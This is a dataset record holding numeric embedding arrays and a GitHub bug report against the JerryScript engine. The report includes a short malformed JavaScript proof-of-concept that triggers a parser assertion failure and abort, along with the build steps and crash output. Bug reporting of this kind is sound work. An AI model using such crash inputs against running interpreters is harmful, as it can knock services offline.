0.013395844027400017, -0.008844692260026932, 0.004691667854785919, -0.006697922013700008, -0.004882925655692816, 0.004422346130013466, 0.023231953382492065, -0.0016569159924983978, -0.0036690249107778072, 0.0024238983169198036, -0.0015427469043061137, 0.004851699806749821, 0.00863391812890768, -0.0025351401418447495, -0.012505910359323025, -0.004918054677546024, -0.010835332795977592, 0.009344303980469704, 0.013028942048549652, -0.008509015664458275, 0.019281897693872452, -0.0013026989763602614, 0.0065652127377688885, 0.026135947555303574, -0.013793972320854664, -0.006327116396278143, -0.022826019674539566, 0.01449655182659626, 0.0010489898268133402, 0.012701071798801422, -0.016346676275134087, -0.01078849472105503, 0.00685795396566391, -0.02059337869286537, -0.005683085415512323, -0.0010528929997235537, -0.0067291478626430035, -0.007217050064355135, -0.003518751123920083, 0.014402874745428562, -0.039094630628824234, 0.01996886357665062, -0.007158502005040646, -0.011615976691246033, 0.013684682548046112, -0.03437954559922218, -0.009071079082787037, 0.016580870375037193, -0.005027344916015863, -0.011327139101922512, -0.023637888953089714, 0.007740081287920475, -0.008688563480973244, 0.011584751307964325, 0.009836109355092049, -0.0026600430719554424, -0.011717460118234158, -0.0024180435575544834, 0.023263178765773773, -0.0056674727238714695, 0.00854804739356041, 0.010078108869493008, -0.005003925412893295, -0.008594886399805546, -0.0039559113793075085, 0.010593333281576633, 0.014090617187321186, 0.01598758064210415, 0.0070414054207503796, -0.024699563160538673, 0.016128096729516983, -0.01013275422155857, 0.002314608311280608, -0.011311525478959084, 0.026135947555303574, -0.021295957267284393, 0.009008627384901047, -0.000629881804343313, 0.009484820067882538, -0.002185801975429058, 0.005733827129006386, 0.01103049423545599, 0.007888403721153736, -0.010819720104336739, -0.016674546524882317, -0.01608125865459442, 0.007138985674828291, 0.008883723989129066, 0.0021174957510083914, 0.016830675303936005, 0.009773657657206059, -0.0012948925141245127, 0.027088332921266556, 0.01767377182841301, -0.012529329396784306, -0.0006254906766116619, -0.003819298930466175, 0.00926623959094286, 0.012950877659022808, -0.013856424018740654, 0.014855647459626198, -0.019016478210687637, 0.004059346858412027, -0.013349005952477455, 0.0005810915608890355, -0.011373977176845074, -0.007400501519441605, -0.011272493749856949, -0.00941456202417612, 0.00021784835553262383, -0.0194848645478487, -0.010897784493863583, -0.002788849174976349, 0.007911822758615017, 0.0036982991732656956, -0.0054645054042339325, 0.01260739378631115, 0.023341244086623192, 0.019797122105956078, -0.011506686918437481, -0.019094541668891907, -0.0017925528809428215, -0.0016481338534504175, -0.011694041080772877, -0.012865006923675537, 0.014863453805446625, 0.0025156240444630384, -0.027213236317038536, 0.005074183456599712, 0.00998443178832531, 0.015573839657008648, -0.0007274622330442071, -0.0016617950750514865, -0.02087440900504589, 0.01807970553636551, 0.000742587202694267, 0.0161905474960804, -0.031100841239094734, 0.005456698592752218, 0.0024902531877160072, -0.02899310365319252, 0.021748730912804604, -0.016705773770809174, -0.014199906960129738, 0.0022326407488435507, 0.005925084929913282, 0.005000022239983082, -0.011350558139383793, 0.0027185913641005754, -0.006471535656601191, -0.010866559110581875, 0.01779867336153984, -0.015222550369799137, -0.007435630075633526, 0.00555818248540163, 0.011678428389132023, 0.000868953880853951, -0.0075332107953727245, -0.005316182971000671, 0.0033645739313215017, 0.012544943019747734, -0.00003750748510356061, 0.022076601162552834, -0.00014929809549357742, 0.0025917368475347757, 0.014114036224782467, 0.0011358364718034863, 0.00006562285125255585, -0.02854033000767231, -0.0016510612331330776, 0.015160098671913147, 0.003050364786759019, 0.000095079951279331, -0.0034621544182300568, -0.013528553768992424, 0.008907143026590347, -0.00034519084147177637, -0.026011044159531593, 0.026057884097099304, -0.002408285392448306, -0.00588605273514986, -0.012256104499101639, -0.017814286053180695, -0.0026658978313207626, -0.013114812783896923, 0.007837661541998386, -0.013770553283393383, 0.002886429661884904, -0.023918919265270233, 0.025167949497699738, 0.011124171316623688, -0.026885366067290306, -0.013497327454388142, 0.008227983489632607, -0.002179947216063738, 0.006553503219038248, -0.00535131199285388, 0.008267016150057316, -0.007279501762241125, -0.014356035739183426, -0.0019818588625639677, 0.017455190420150757, 0.02468395046889782, 0.005452795419842005, -0.0025136724580079317, -0.006818921770900488, 0.017377126961946487, -0.003147945273667574, -0.005011731758713722, 0.002570269163697958, 0.00633492274209857, -0.0028961878269910812, 0.0010138609213754535, 0.017080482095479965, 0.01437164843082428, 0.01123346108943224, 0.025854915380477905, 0.0012197556206956506, 0.012060943990945816, -0.01586267724633217, -0.0068852766416966915, -0.01873544603586197, -0.0067213415168225765, -0.01759570650756359, 0.0075332107953727245, -0.015948548913002014, 0.009274045936763287, -0.023060211911797523, 0.011397396214306355, 0.03091348707675934, -0.019953250885009766, 0.0006723292754031718, -0.008868111297488213, -0.005940697621554136, -0.02697904221713543, -0.012958684004843235, 0.012084363028407097, 0.0158860981464386, 0.0014266262296587229, -0.0019145284313708544, 0.008719788864254951, -0.026744849979877472, -0.03247477486729622, 0.014176487922668457, 0.0009655585745349526, 0.03269335255026817, 0.00967998057603836, -0.0011924330610781908, 0.003985185641795397, 0.027744073420763016, -0.017127320170402527, -0.0005225433269515634, 0.006463728845119476, -0.0008260185131803155, 0.013528553768992424, 0.0012109733652323484, 0.0025039142929017544, -0.010655784979462624, 0.007107759825885296, -0.007728371769189835, -0.01565971039235592, -0.006959437858313322, -0.009781464003026485, -0.006877470295876265, 0.02185802161693573, 0.02513672411441803, 0.011608170345425606, -0.0017593755619600415, -0.001799383549951017, 0.001994544407352805, -0.00006171963468659669, 0.006182697135955095, -0.00327089661732316, -0.009812690317630768, 0.007634694222360849, 0.010413785465061665, 0.01787673868238926, -0.005507440771907568, -0.014441906474530697, 0.017814286053180695, 0.021046152338385582, -0.006030471995472908, -0.0025527046527713537, 0.0017652303213253617, 0.0025488012470304966, -0.004625313449651003, 0.01956292800605297, 0.0036670733243227005, 0.012825974263250828, -0.01131933182477951, 0.00018052382802125067, -0.010757268406450748, 0.0010802155593410134, -0.025683173909783363, -0.009836109355092049, 0.002228737575933337, 0.0009684859542176127, -0.0019779556896537542, 0.008688563480973244, -0.02316950261592865, 0.017564481124281883, -0.009648755192756653, -0.0008304096409119666, 0.0063544390723109245, -0.0124044269323349, -0.008477789349853992, 0.010983655229210854, -0.0016471579438075423, 0.013583198189735413, -0.004012508317828178, -0.005636246874928474, -0.010210818611085415, -0.006666696164757013, 0.010780688375234604, -0.011936040595173836, -0.012256104499101639, 0.014652680605649948, -0.012849393300712109, -0.015347452834248543, 0.02775968611240387, -0.004711184184998274, 0.012224879115819931, -0.004855602979660034, 0.015745582059025764, 0.004918054677546024, 0.002714688191190362, 0.026682397350668907, 0.011834557168185711, -0.008352886885404587, 0.0017232707468792796, 0.0011065623257309198, -0.01312261912971735, -0.0060265688225626945, 0.015433323569595814, 0.006280277855694294, -0.02780652418732643, -0.000018647013348527253, -0.008782240562140942, 0.01072604302316904, 0.00001905868157336954, 0.01404377818107605, -0.022342020645737648, 0.014871260151267052, 0.0067291478626430035, -0.007302920799702406, -0.0004759486473631114, -0.00711556663736701, 0.009695593267679214, 0.005480118095874786, 0.02218589186668396, -0.012943071313202381, 0.00941456202417612, -0.01976589672267437, 0.012193652801215649, 0.004086669068783522, 0.0028805749025195837, -0.02112421579658985, 0.004024217836558819, 0.0204997006803751, 0.0172209981828928, 0.0013592956820502877, 0.003963717725127935, -0.0074551464058458805, -0.015737775713205338, -0.0006054866826161742, -0.003760750638321042, 0.0014861501986160874, -0.003108913078904152, -0.004816570784896612, 0.01260739378631115, 0.010983655229210854, -0.020936861634254456, 0.017080482095479965, -0.023809630423784256, -0.002427801489830017, -0.019094541668891907, -0.021233506500720978, -0.006580825429409742, -0.008602692745625973, -0.011334945447742939, 0.016018806025385857, 0.0045355395413935184, -0.014933711849153042, 0.004391120281070471, -0.01105391327291727, 0.003934443928301334, -0.010093721561133862, -0.0038134439382702112, -0.01686190254986286, 0.0020765119697898626, -0.0034641060046851635, 0.00836849957704544, -0.013950101099908352, -0.009406755678355694, -0.02530846558511257, 0.022029763087630272, 0.016471579670906067, -0.012232685461640358, -0.007295114453881979, 0.010351333767175674, -0.0038036860059946775, -0.005577698349952698, 0.0073302434757351875, -0.00659253541380167, -0.007958661764860153, -0.005226409062743187, 0.006697922013700008, 0.010804107412695885, 0.008743207901716232, -0.006405180785804987, 0.022544987499713898, 0.026182785630226135, 0.002363398438319564, 0.0009543367777951062, -0.011834557168185711, 0.03375503048300743, -0.007279501762241125, 0.012490297667682171, -0.003981282468885183, -0.010733849368989468, -0.0013173361076042056, 0.0036104766186326742, 0.0003273824113421142, 0.029945489019155502, -0.0076112751848995686, -0.002566365757957101, -0.02316950261592865, 0.02059337869286537, 0.0016042225761339068, 0.004695571027696133, -0.021295957267284393, 0.0064325034618377686, -0.00889933668076992, -0.025355303660035133, -0.0026776075828820467, 0.03800173103809357, 0.007217050064355135, 0.0005162005545571446, 0.014153068885207176, -0.01508984062820673, 0.0014354083687067032, 0.03145993873476982, 0.011873588897287846, -0.009071079082787037, 0.0005903617129661143, -0.007825952023267746, 0.006057794205844402, 0.004586281254887581, 0.013231908902525902, -0.002878623316064477, -0.019453639164566994, 0.02135840803384781, -0.018298285081982613, 0.034098513424396515, -0.010694817639887333, -0.009640948846936226, 0.006811115425080061, 0.004664345644414425, 0.016752611845731735, 0.01840757578611374, 0.014059390872716904, -0.0012841586722061038, -0.011397396214306355, -0.011272493749856949, -0.022950921207666397, 0.00016625269199721515, -0.003737331135198474, 0.016393516212701797, -0.012162427417933941, 0.009125723503530025, -0.006182697135955095, 0.0013388037914410233, -0.011108558624982834, -0.00040398305281996727, 0.011545718647539616, -0.015823645517230034, 0.024496596306562424, 0.00639737443998456, 0.019078928977251053, -0.0020101573318243027, -0.00739269470795989, -0.0020316250156611204, 0.003296267706900835, -0.02165505290031433, 0.0073770820163190365, 0.01279474887996912, -0.02054653875529766, 0.0134270703420043, -0.03437954559922218, 0.015745582059025764, -0.011678428389132023, 0.016674546524882317, 0.021639440208673477, -0.007228759583085775, -0.015238163061439991, -0.02067144215106964, -0.014075004495680332, 0.00718582421541214, 0.018064092844724655, 0.006163181271404028, -0.0008840788505040109, -0.008626111783087254, -0.006787695921957493, -0.0018257301999256015, 0.0011358364718034863, 0.01795480214059353, 0.011803330853581429, 0.005456698592752218, -0.009961012750864029, -0.00594460079446435, -0.013708101585507393, -0.009711205959320068, 0.017939189448952675, 0.025152336806058884, 0.01943802647292614, 0.005327892489731312, 0.030570004135370255, -0.00017003393440973014, -0.012240491807460785, 0.013216296210885048, 0.009562884457409382, 0.012107782065868378, 0.011608170345425606, -0.013294360600411892, -0.0013280699495226145, -0.017455190420150757, -0.007861081510782242, 0.028852587565779686, 0.0019233106868341565, -0.0037783149164170027, -0.003323590150102973, 0.006206116639077663, -0.018298285081982613, 0.010242043994367123, 0.0006113415001891553, 0.015527001582086086, 0.013591005466878414, -0.006881373468786478, -0.005491827614605427, -0.004250604193657637, 0.00830604787915945, 0.018563704565167427, 0.01314603816717863, 0.004617507103830576, 0.017174160107970238, -0.00881346594542265, 0.00770885543897748, 0.00411008857190609, -0.008173338137567043, -0.027541106566786766, 0.010226431302726269, 0.022623050957918167, -0.015292808413505554, -0.0064325034618377686, 0.0069204056635499, -0.023341244086623192, -0.0025429464876651764, -0.0030074294190853834, -0.07600346207618713, 0.0025292851496487856, 0.011264687404036522, -0.010554301552474499, -0.0060734073631465435, 0.009890754707157612, 0.007119469810277224, -0.01260739378631115, -0.008868111297488213, 0.0033528641797602177, 0.009110110811889172, -0.01213900838047266, -0.006089020054787397, -0.021623827517032623, -0.027322525158524513, -0.007349759340286255, 0.008384112268686295, 0.00036519483546726406, 0.020484087988734245, 0.018438801169395447, -0.009562884457409382, -0.012888425961136818, -0.021186666563153267, -0.0021350602619349957, 0.013138231821358204, -0.0027439622208476067, 0.0344419963657856, -0.012630813755095005, -0.01644035428762436, -0.012256104499101639, -0.014184294268488884, -0.007119469810277224, 0.012053137645125389, 0.014363842085003853, 0.00946920644491911, -0.03063245490193367, -0.025901755318045616, -0.0081030810251832, 0.0006835510721430182, 0.0019808830693364143, -0.005000022239983082, -0.00033274933230131865, 0.019859572872519493, -0.0009284779662266374, 0.027541106566786766, 0.012513716705143452, -0.009555078111588955, 0.02924290858209133, 0.009117917157709599, 0.009422368369996548, 0.004609700292348862, 0.010445011779665947, 0.008743207901716232, 0.011436428874731064, 0.013661262579262257, 0.00023541283735539764, 0.001730101415887475, -0.0166120957583189, 0.005136634688824415, 0.007478565908968449, -0.008649530820548534, -0.005889955908060074, -0.006065600551664829, -0.006124149076640606, -0.003546073567122221, 0.020936861634254456, 0.005854826886206865, 0.017127320170402527, 0.03497283160686493, 0.0081030810251832, 0.006772083230316639, -0.003101106733083725, -0.00971901323646307, -0.01631545089185238, -0.010554301552474499, 0.008540241047739983, 0.00555818248540163, -0.012943071313202381, 0.01648719236254692, 0.023528598248958588, 0.006104632746428251, 0.004617507103830576, 0.0055113439448177814, -0.004754119552671909, -0.013669069856405258, 0.0034894768614321947, 0.012810361571609974, 0.0011270542163401842, 0.026838526129722595, -0.004976602736860514, 0.012170233763754368, 0.005265441257506609, -0.03316174075007439, 0.0031147680711001158, -0.0034894768614321947, -0.008142112754285336, -0.02657310850918293, -0.0008318733307532966, 0.0021057859994471073, 0.01595635525882244, -0.008274822495877743, 0.008321660570800304, -0.0014793196460232139, 0.00639737443998456, 0.005199086386710405, 0.006338825915008783, -0.013302166946232319, 0.005601117853075266, 0.006561309564858675, 0.01767377182841301, 0.01878228411078453, -0.00896178837865591, -0.010929010808467865, 0.0015983678167685866, -0.009906367398798466, -0.007814242504537106, -0.004711184184998274, -0.00756443664431572, 0.003946153447031975, -0.0007845468353480101, 0.002043334534391761, -0.018110930919647217, 0.0020706572104245424, 0.0018208512337878346, -0.006377858109772205, -0.013208489865064621, 0.014332616701722145, 0.0076581137254834175, -0.0013446585508063436, -0.022607438266277313, 0.011171010322868824, 0.008399724960327148, -0.009961012750864029, 0.0018325608689337969, 0.004808764439076185, 0.007349759340286255, 0.01951608993113041, -0.00274786539375782, -0.01751764304935932, -0.009149142540991306, -0.003440686734393239, 0.00965656153857708, -0.007849371060729027, 0.004320862237364054, -0.02435608021914959, -0.025433368980884552, -0.00561673054471612, 0.01911015622317791, -0.009851722046732903, 0.013052361086010933, 0.010858752764761448, 0.016424741595983505, 0.017736222594976425, 0.005046860780566931, -0.01502738893032074, 0.0291180070489645, 0.013341198675334454, 0.020562153309583664, -0.004867312964051962, 0.004882925655692816, -0.019984476268291473, 0.01554261427372694, 0.0000765396689530462, 0.006295890547335148, -0.002779091242700815, 0.0024707370903342962, 0.0020179636776447296, 0.004309152718633413, 0.004180346615612507, -0.011725266464054585, 0.007868887856602669, 0.0138408113270998, -0.01318507082760334, 0.004250604193657637, 0.02148331142961979, -0.007388791535049677, -0.008922756649553776, -0.02591736800968647, -0.007084340788424015, -0.011498880572617054, -0.009726819582283497, -0.0036221863701939583, -0.01653403230011463, -0.01236539427191019, -0.009281852282583714, -0.0012080459855496883, 0.024980595335364342, -0.004555055405944586, 0.0001956487976713106, -0.0024297533091157675, 0.0076659200713038445, 0.02632330171763897, -0.002258011605590582, -0.02374717779457569, 0.03124135732650757, -0.0007918653427623212, 0.007271694950759411, 0.01673699915409088, -0.011639395728707314, -0.01511325966566801, 0.024871304631233215, 0.010429398156702518, 0.011959459632635117, 0.011701847426593304, -0.01739273965358734, -0.034254640340805054, 0.022935308516025543, 0.00671353517100215, -0.0073770820163190365, 0.013614424504339695, 0.015082034282386303, 0.01565971039235592, 0.009789270348846912, -0.0045355395413935184, 0.023060211911797523, 0.005195183213800192, -0.015737775713205338, 0.01651841774582863, -0.0023477855138480663, 0.009297464974224567, 0.05055448040366173, -0.0051054093055427074, -0.01018739864230156, 0.0031108646653592587, -0.008657337166368961, -0.0161905474960804, 0.00482828076928854, 0.024840079247951508, 0.00756443664431572, 0.010679204016923904, 0.022826019674539566, 0.017783060669898987, 0.036721475422382355, 0.014730744995176792, -0.015144485980272293, -0.002820075023919344, -0.0035772991832345724, -0.021764343604445457, 0.011311525478959084, -0.012888425961136818, 0.004480894189327955, -0.010811913758516312, -0.01164720207452774, 0.00392663711681962, -0.010296689346432686, 0.011178816668689251, 0.02296653389930725, -0.0011211993405595422, 0.013278747908771038, -0.037627022713422775, 0.024746401235461235, 0.01800164207816124, -0.024637112393975258, 0.028352975845336914, 0.0003959326713811606, 0.0037705085705965757, -0.005480118095874786, 0.002230689162388444, 0.012459072284400463, 0.004234991502016783, -0.0006074383272789419, -0.011678428389132023, 0.019875185564160347, 0.013809585012495518, 0.020733894780278206, -0.011256881058216095, -0.0015124969650059938, -0.010468430817127228, 0.0050195385701954365, -0.009914173744618893, 0.00738098518922925, -0.011818944476544857, -0.03125697001814842, -0.011897008866071701, -0.01007030252367258, -0.0028513006400316954, -0.008985207416117191, -0.0038173471111804247, 0.004352088086307049, -0.023996984586119652, -0.009961012750864029, -0.0013553925091400743, -0.025277240201830864, -0.005320086143910885, 0.026182785630226135, 0.0034309285692870617, -0.029508328065276146, -0.0037334279622882605, 0.0009416513494215906, 0.019797122105956078, 0.009149142540991306, -0.003409460885450244, 0.01754886843264103, -0.010944623500108719, -0.044184427708387375, -0.003952008206397295, 0.004566764924675226, 0.031350646167993546, -0.012084363028407097, 0.022014150395989418, -0.007654210552573204, -0.022810405120253563, -0.00012173160939710215, 0.012677651830017567, -0.011725266464054585, -0.00006763544661225751, 0.0077752103097736835, -0.019203832373023033, -0.002441462827846408, -0.0057845693081617355, -0.02004692703485489, -0.02223272994160652, 0.02448098361492157, 0.0007396598230116069, 0.0081030810251832, 0.030351422727108, 0.019625380635261536, 0.004582378081977367, 0.008579272776842117, 0.013434876687824726, 0.02448098361492157, -0.005936794448643923, -0.030132843181490898, -0.011615976691246033, -0.0024570757523179054, 0.0035285090561956167, 0.030538776889443398, 0.002964494051411748, 0.01603441871702671, 0.0006059745792299509, 0.014910292811691761, 0.02037479728460312, -0.026807300746440887, 0.017829900607466698, 0.0007069703424349427, 0.025573885068297386, -0.010366947390139103, -0.008025016635656357, -0.019203832373023033, 0.0012363443383947015, 0.013583198189735413, -0.003973476123064756, 0.004824377596378326, 0.0008518773247487843, 0.002373156603425741, -0.010257656686007977, 0.0023185114841908216, -0.0072443727403879166, 0.005000022239983082, 0.012599587440490723, -0.01653403230011463, 0.005257634446024895, -0.010608946904540062, 0.005000022239983082, 0.021514536812901497, 0.005253731273114681, 0.0002990840876009315, -0.0026463817339390516, 0.002302898559719324, 0.022029763087630272, -0.00023016789054963738, -0.008438757620751858, 0.006627663969993591, -0.02279479242861271, -0.013864230364561081, 0.021717505529522896, 0.0055503761395812035, -0.0018754962366074324, -0.0011865783017128706, -0.0014695615973323584, -0.0012607394019141793, -0.01096804253757, 0.013044554740190506, 0.07038282603025436, -0.008399724960327148, -0.004004701506346464, -0.02985181100666523, -0.01341145671904087, 0.02014060504734516, -0.015386485494673252, 0.047307003289461136, -0.015074227936565876, 0.005737730301916599, 0.0034641060046851635, -0.018485641106963158, -0.0005366925033740699, 0.004800958093255758, 0.0010685059241950512, -0.009539464488625526, 0.005444989074021578, -0.024715175852179527, -0.002991816494613886, 0.014512164518237114, -0.021217893809080124, -0.023653501644730568, 0.0060812137089669704, -0.006366148591041565, 0.004434055648744106, -0.0262452382594347, -0.016377903521060944, -0.0012519571464508772, 0.0090242400765419, 0.019609767943620682, -0.011834557168185711, -0.0037861214950680733, -0.00965656153857708, -0.013278747908771038, 0.003774411743506789, 0.015316227450966835, -0.015558226965367794, 0.011303719133138657, 0.0018637866014614701, 0.010210818611085415, 0.005444989074021578, 0.005253731273114681, 0.014691712334752083, -0.004781442228704691, 0.02612033486366272, -0.019500477239489555, -0.002238495508208871, -0.0017554722726345062, -0.0016900934278964996, 0.002505865879356861, -0.0061514717526733875, -0.009765851311385632, 0.006619857624173164, -0.012451265007257462, 0.010850946418941021, 0.014059390872716904, 0.0156831294298172, 0.021139828488230705, 0.0019545364193618298, -0.01314603816717863, 0.0022521568462252617, 0.021748730912804604, 0.015800226479768753, 0.008907143026590347, -0.025417756289243698, -0.017111707478761673, -0.003749040886759758, 0.015464549884200096, -0.0014276020228862762, 0.00818114448338747, 0.02591736800968647, -0.011405202560126781, -0.007306823972612619, -0.0010099576320499182, 0.012310749851167202, 0.009843915700912476, -0.0015427469043061137, 0.00857146643102169, -0.008259208872914314, -0.005683085415512323, -0.013723714277148247, 0.015644097700715065, -0.010523076169192791, 0.010913397185504436, 0.0037978310137987137, -0.005284957122057676, -0.00011386418918846175, 0.014683905988931656, -0.008001596666872501, 0.013224102556705475, 0.009804883971810341, -0.00621392298489809, -0.007939144968986511, -0.005265441257506609, -0.007970371283590794, 0.009609722532331944, 0.016221774742007256, 0.015792420133948326, 0.0031498968601226807, -0.028352975845336914, 0.01111636497080326, 0.0003312856424599886, -0.0014207713538780808, 0.004863409791141748, 0.004800958093255758, 0.017642544582486153, 0.01608125865459442, 0.024512208998203278, 0.0012021911097690463, -0.007334146648645401, -0.002382914535701275, 0.007142888847738504, -0.013107006438076496, 0.004188152961432934, -0.0036865894217044115, -0.03216251730918884, 0.0038700406439602375, 0.002478543436154723, 0.03325541689991951, -0.0074551464058458805, -0.007318533957004547, -0.007689339574426413, -0.017330287024378777, -0.009164756163954735, -0.005683085415512323, 0.0068852766416966915, 0.01377835962921381, -0.011818944476544857, 0.0157846137881279, 0.015495775267481804, -0.008407531306147575, 0.012825974263250828, 0.006658889818936586, 0.004949280526489019, 0.011701847426593304, 0.01181113813072443, 0.024059435352683067, -0.0005815794575028121, -0.016596483066678047, 0.026541883125901222, 0.018095318228006363, 0.0055425697937607765, 0.035784702748060226, -0.0028727685566991568, 0.0071741146966814995, 0.003819298930466175, 0.025480207055807114, -0.01521474402397871, -0.0024843981955200434, 0.012646426446735859, -0.01701803132891655, 0.01142081618309021, 0.0018637866014614701, 0.005866536870598793, 0.009445787407457829, -0.002304850146174431, -0.00843095127493143, 0.0029859617352485657, 0.014176487922668457, 0.013224102556705475, 0.01964099332690239, -0.008087467402219772, 0.0036085250321775675, -0.005913375411182642, 0.018641769886016846, 0.0029293650295585394, 0.012568362057209015, -0.0291180070489645, 0.01837635040283203, -0.020156217738986015, 0.011022687889635563, 0.00796646811068058, -0.0038310084491968155, 0.008751015178859234, 0.009734625928103924, -0.0037919762544333935, 0.0063622454181313515, -0.0069711473770439625, 0.0002944490115623921, -0.0070414054207503796, -0.002392672700807452, 0.007474662270396948, 0.03138187155127525, 0.04146778956055641, -0.012810361571609974, 0.004886828828603029, -0.013591005466878414, -0.0180484801530838, 0.01648719236254692, -0.007474662270396948, -0.005952407605946064, 0.0024453660007566214, -0.03210006654262543, -0.011787718161940575, 0.005070280283689499, -0.004652635660022497, 0.0025351401418447495, -0.010351333767175674, 0.00600705249235034, 0.0007030671695247293, -0.00843095127493143, 0.004586281254887581, -0.011171010322868824, 0.0033255417365580797, 0.012146814726293087, 0.005581601522862911, -0.002962542464956641, 0.002995719900354743, 0.019375573843717575, 0.00024321927048731595, 0.014145261608064175 ]
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: [a6ab5e9](https://github.com/jerryscript-project/jerryscript/commit/a6ab5e9abed70cdedf9f4e9c1dc379eb762ebf64) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript function JSEtest() { function o() {} function k() { for (i = 0; i < this.depth; ++i) {} } for (var i = 0; i < 10; i++) (i) = {o: o, {: k}; } JSEtest(); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'context.status_flags & PARSER_SCANNING_SUCCESSFUL' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_source):2348. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 33673 abort jerry poc.js ```
Assertion 'context.status_flags & PARSER_SCANNING_SUCCESSFUL' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_source):2348.
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4929/comments
1
2022-01-04T06:08:29
2022-01-04T11:16:10Z
https://github.com/jerryscript-project/jerryscript/issues/4929
1,093,040,868
4,929
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Assertion 'context.status_flags & PARSER_SCANNING_SUCCESSFUL' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_source):2348. Issue date: --- start body --- ###### JerryScript revision Commit: [a6ab5e9](https://github.com/jerryscript-project/jerryscript/commit/a6ab5e9abed70cdedf9f4e9c1dc379eb762ebf64) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript function JSEtest() { function o() {} function k() { for (i = 0; i < this.depth; ++i) {} } for (var i = 0; i < 10; i++) (i) = {o: o, {: k}; } JSEtest(); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'context.status_flags & PARSER_SCANNING_SUCCESSFUL' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_source):2348. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 33673 abort jerry poc.js ``` --- end body ---
1,490
[ -0.002735111629590392, 0.007463078945875168, -0.0027480043936520815, -0.0009623541263863444, 0.01750471442937851, -0.006748450454324484, -0.0030261201318353415, 0.0401076041162014, -0.04099167883396149, 0.018668748438358307, -0.004744543693959713, -0.015029300935566425, 0.022426074370741844, 0.005809119436889887, -0.002221242291852832, 0.02083473652601242, -0.0068258075043559074, 0.00930490531027317, -0.02858513966202736, -0.009990064427256584, -0.008251381106674671, 0.017151083797216415, -0.007396773435175419, 0.04697393253445625, 0.003009543754160404, -0.003827314591035247, 0.007573588751256466, 0.0012957246508449316, -0.03415482118725777, -0.0290713831782341, 0.0032987105660140514, 0.013924204744398594, -0.008597644045948982, 0.02232293225824833, 0.03315286710858345, 0.022573420777916908, 0.04349656403064728, 0.03586403653025627, -0.0005028184968978167, -0.008280850015580654, -0.006866327486932278, -0.03533359244465828, -0.016414353623986244, 0.01959702931344509, 0.007256794720888138, 0.04965563118457794, 0.03627660498023033, 0.008619746193289757, -0.02565295249223709, 0.01318010687828064, 0.018683483824133873, 0.01729843020439148, 0.03592297434806824, -0.059734102338552475, 0.037337496876716614, -0.015036667697131634, 0.021689344197511673, -0.015441869385540485, 0.008030361495912075, 0.016163865104317665, -0.008818662725389004, -0.0008942065760493279, -0.00042177815339528024, 0.01782887615263462, 0.03076586313545704, 0.06300518661737442, -0.014609363861382008, -0.008884969167411327, 0.003215828211978078, 0.013003291562199593, 0.0045198411680758, -0.019832782447338104, 0.032887645065784454, 0.044940557330846786, 0.01927286759018898, -0.018138302490115166, 0.00769146578386426, 0.021895628422498703, -0.015427134931087494, -0.031237369403243065, -0.00046321924310177565, 0.023707984015345573, -0.031649939715862274, -0.013165372423827648, 0.0037554833106696606, 0.004350393079221249, 0.00969537254422903, -0.08045095950365067, 0.0016309369821101427, -0.0046745543368160725, -0.020495839416980743, 0.030235417187213898, -0.01200133841484785, -0.006903164088726044, 0.0013021710328757763, 0.02445944957435131, -0.0034165873657912016, 0.005068705417215824, -0.02837885543704033, 0.006634257268160582, -0.0004899257328361273, -0.006906847469508648, 0.0034386892803013325, -0.0006160908378660679, 0.00969537254422903, 0.023958472535014153, 0.012929619289934635, -0.013813694939017296, 0.04214097931981087, 0.1300181895494461, -0.03636501356959343, 0.009341741912066936, -0.0014697771985083818, -0.042730364948511124, 0.004066751804202795, 0.00039138805004768074, 0.011087792925536633, -0.017593123018741608, -0.02429736964404583, 0.028644079342484474, -0.05151218920946121, -0.021011551842093468, -0.011330913752317429, -0.004092537332326174, -0.009879554621875286, 0.022823909297585487, 0.04924306273460388, -0.01762259192764759, 0.014668302610516548, -0.032681360840797424, -0.04184628650546074, -0.013261147774755955, 0.001167717739008367, 0.0015029300702735782, 0.04452798515558243, 0.008126136846840382, -0.03315286710858345, 0.025476137176156044, -0.023486966267228127, -0.05260255187749863, -0.046885523945093155, 0.0049913483671844006, 0.05478327348828316, 0.005333928391337395, 0.002873248653486371, 0.010616285726428032, -0.024768875911831856, 0.022676562890410423, -0.014233632013201714, 0.01344532985240221, -0.016738515347242355, -0.0020444269757717848, 0.008936540223658085, 0.005488641560077667, 0.040873803198337555, 0.002061003353446722, 0.00010354515688959509, 0.0483589842915535, 0.01023318525403738, 0.03483261540532112, -0.034243229776620865, -0.041905228048563004, -0.011087792925536633, 0.0046266671270132065, -0.037337496876716614, -0.010299491696059704, -0.03474420681595802, 0.0029800746124237776, 0.012738068588078022, 0.009673270396888256, -0.021365182474255562, -0.0026982752606272697, 0.005370764993131161, 0.0191549900919199, -0.029631298035383224, 0.0035749843809753656, 0.010218450799584389, 0.032592952251434326, 0.0012644135858863592, 0.002834570361301303, 0.019331805408000946, 0.017769938334822655, -0.008037729188799858, -0.013997877947986126, 0.02009800635278225, 